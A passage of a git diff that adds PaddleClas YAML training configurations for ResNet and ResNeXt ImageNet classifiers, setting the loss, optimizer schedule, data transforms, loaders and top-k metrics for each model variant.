DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_32x4d.yaml new file mode 100644 index 0000000..466dfb3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt50_vd_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_64x4d.yaml new file mode 100644 index 0000000..d2a2f86 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_vd_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt50_vd_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x16d_wsl.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x16d_wsl.yaml new file mode 100644 index 0000000..792311a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x16d_wsl.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x16d_wsl + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x32d_wsl.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x32d_wsl.yaml new file mode 100644 index 0000000..a943ebb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x32d_wsl.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x32d_wsl + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x48d_wsl.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x48d_wsl.yaml new file mode 100644 index 0000000..7f8fa72 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x48d_wsl.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x48d_wsl + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x8d_wsl.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x8d_wsl.yaml new file mode 100644 index 0000000..3266c34 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt101_wsl/ResNeXt101_32x8d_wsl.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x8d_wsl + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101.yaml new file mode 100644 index 0000000..a4f228f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ResNet101 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101_vd.yaml new file mode 100644 index 0000000..83d1fc0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet101_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet101_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152.yaml new file mode 100644 index 0000000..b915713 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ResNet152 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152_vd.yaml new file mode 100644 index 0000000..e09bb60 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet152_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet152_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18.yaml new file mode 100644 index 0000000..64edd5e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet18 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + 